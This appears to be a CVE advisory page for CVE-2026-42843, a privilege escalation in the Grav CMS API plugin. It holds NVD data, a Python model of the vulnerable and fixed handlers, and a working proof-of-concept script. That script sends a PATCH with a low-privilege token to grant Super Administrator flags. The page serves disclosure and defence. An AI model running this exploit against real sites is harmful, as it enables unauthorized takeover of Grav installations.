Security Vulnerability Report
CVE-2026-42843 CVSS 8.8 HIGH

CVE-2026-42843

Published: 2026-05-11 17:16:34
Last Modified: 2026-05-11 20:25:43

Description

Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content, media, configuration, users, and system management. Prior to 1.0.0-beta.15, an insecure direct object reference and logic flaw in the Grav API plugin (UsersController::update) allows any authenticated user with basic API access (api.access) to modify their own permission configuration. An attacker can exploit this to escalate their privileges to Super Administrator (admin.super and api.super), leading to full system compromise and potential RCE. This vulnerability is fixed in 1.0.0-beta.15.
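The flaw described above is an authorization decision made in the wrong place: the update handler trusts the request body and merges it into the caller's own account record, permission block included. The following is an added Python model of that decision and of one way to fix it; it is not code from the Grav API plugin (which is PHP), and the account layout ("permissions" -> "admin"/"api" -> boolean flags), the sample users and the self-editable field list are assumptions taken from the PoC payload on this page, not verified plugin internals. The vulnerable handler and the hardened handler are shown side by side, and the PoC body is replayed through both.

```python
"""Model of the CVE-2026-42843 authorization flaw and one way to fix it.

Added example: NOT code from the Grav API plugin (which is PHP). It models
the decision UsersController::update has to make. The account layout
("permissions" -> "admin"/"api" -> flags), user names and the self-editable
field list are assumptions following the PoC payload on this page.
"""
from copy import deepcopy

# Constructed sample user store: one super administrator and one user
# holding nothing but basic API access (api.access).
USERS = {
    "admin": {
        "email": "admin@example.test",
        "permissions": {"admin": {"super": True, "login": True},
                        "api": {"super": True, "access": True}},
    },
    "alice": {
        "email": "alice@example.test",
        "permissions": {"admin": {"login": False}, "api": {"access": True}},
    },
}

# Body the PoC on this page sends as the low-privilege user.
POC_PAYLOAD = {"permissions": {"admin": {"super": True, "login": True},
                               "api": {"super": True}}}

# Fields an ordinary user may change on their own account (assumed list).
SELF_EDITABLE = {"email", "fullname", "language", "password"}


def flatten(perms, prefix=""):
    """{'admin': {'super': True}} -> {'admin.super': True} (dotted names)."""
    out = {}
    for key, value in perms.items():
        name = prefix + key
        if isinstance(value, dict):
            out.update(flatten(value, name + "."))
        else:
            out[name] = bool(value)
    return out


def is_super(user):
    """True if the account holds either super-administrator flag."""
    flags = flatten(user.get("permissions", {}))
    return flags.get("admin.super", False) or flags.get("api.super", False)


def deep_merge(dst, src):
    """Recursively merge src into dst in place; scalars in src win."""
    for key, value in src.items():
        if isinstance(value, dict) and isinstance(dst.get(key), dict):
            deep_merge(dst[key], value)
        else:
            dst[key] = value


def update_vulnerable(users, actor, target, patch):
    """Pre-fix behaviour as the advisory describes it: a holder of api.access
    may update their own record, and the whole request body is merged into
    it, the permission block included (CWE-863)."""
    users = deepcopy(users)
    if actor != target and not is_super(users[actor]):
        raise PermissionError(f"{actor} may only update their own account")
    deep_merge(users[target], patch)
    return users


def update_fixed(users, actor, target, patch):
    """Hardened version: a non-super actor may touch only their own account
    and only an allowlist of profile fields. Permission changes, and edits to
    other accounts, need an actor who already is a super administrator. An
    allowlist (not a denylist of 'permissions') is used so that aliased or
    differently-cased keys cannot slip past the check."""
    users = deepcopy(users)
    if target not in users:
        raise KeyError(target)
    if is_super(users[actor]):
        deep_merge(users[target], patch)
        return users
    if actor != target:
        raise PermissionError(f"{actor} may only update their own account")
    disallowed = set(patch) - SELF_EDITABLE
    if disallowed:
        raise PermissionError(f"{actor} may not modify {sorted(disallowed)}")
    deep_merge(users[target], patch)
    return users


def run_poc(update_fn, users=USERS):
    """Replay the PoC body as 'alice' against her own account through the
    given handler. Returns True if she ends up a super administrator."""
    try:
        after = update_fn(users, actor="alice", target="alice", patch=POC_PAYLOAD)
    except PermissionError:
        return False
    return is_super(after["alice"])


if __name__ == "__main__":
    print("vulnerable handler -> alice is super:", run_poc(update_vulnerable))
    print("fixed handler      -> alice is super:", run_poc(update_fixed))
```

Running the module prints `True` for the vulnerable handler and `False` for the fixed one. The point a reviewer of the real fix should check is the same as in the model: the permission block must be unreachable from a self-service update for anyone who is not already a super administrator, enforced by an allowlist of editable fields rather than by stripping one known key from the body.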

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
(Network attack vector, low complexity, low privileges required (an api.access token), no user interaction, scope unchanged, high confidentiality, integrity and availability impact; exploitability subscore 2.8, impact subscore 5.9)
Weakness
CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

No CPE configuration data is available in the NVD record yet (vulnStatus: Received).

Affected, per the description: Grav API Plugin (for Grav CMS) < 1.0.0-beta.15. Fixed in 1.0.0-beta.15.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
The PoC sends a PATCH to the self-service user endpoint with a body that sets the super-administrator flags; a 200 response indicates the unfixed handler merged the permission block into the caller's own account.

python
import requests

# Exploit Title: Grav API Plugin - Privilege Escalation (CVE-2026-42843)
# Description: Exploit IDOR to escalate user privileges to Super Admin

# Endpoint and token as assumed by this PoC: the caller's own user record,
# reached with a token that carries only basic API access (api.access).
target_url = "http://target-site.com/api/users/self"
api_token = "LOW_PRIVILEGE_API_TOKEN"

headers = {
    "Authorization": f"Bearer {api_token}",
    "Content-Type": "application/json",
}

# Payload to grant super admin privileges (Python booleans; requests
# serialises them to JSON true)
payload = {
    "permissions": {
        "admin": {"super": True, "login": True},
        "api": {"super": True},
    }
}

try:
    response = requests.patch(target_url, json=payload, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Successfully escalated privileges to Super Administrator.")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
except requests.RequestException as e:
    print(f"Error: {e}")

References

https://github.com/getgrav/grav/security/advisories/GHSA-r945-h4vm-h736 (GitHub Security Advisory; listed twice in the NVD record, once per source)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-42843",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-11T17:16:34.013",
    "lastModified": "2026-05-11T20:25:42.893",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content, media, configuration, users, and system management. Prior to 1.0.0-beta.15, an insecure direct object reference and logic flaw in the Grav API plugin (UsersController::update) allows any authenticated user with basic API access (api.access) to modify their own permission configuration. An attacker can exploit this to escalate their privileges to Super Administrator (admin.super and api.super), leading to full system compromise and potential RCE. This vulnerability is fixed in 1.0.0-beta.15."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-863"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/getgrav/grav/security/advisories/GHSA-r945-h4vm-h736", "source": "[email protected]"},
      {"url": "https://github.com/getgrav/grav/security/advisories/GHSA-r945-h4vm-h736", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}
    ]
  }
}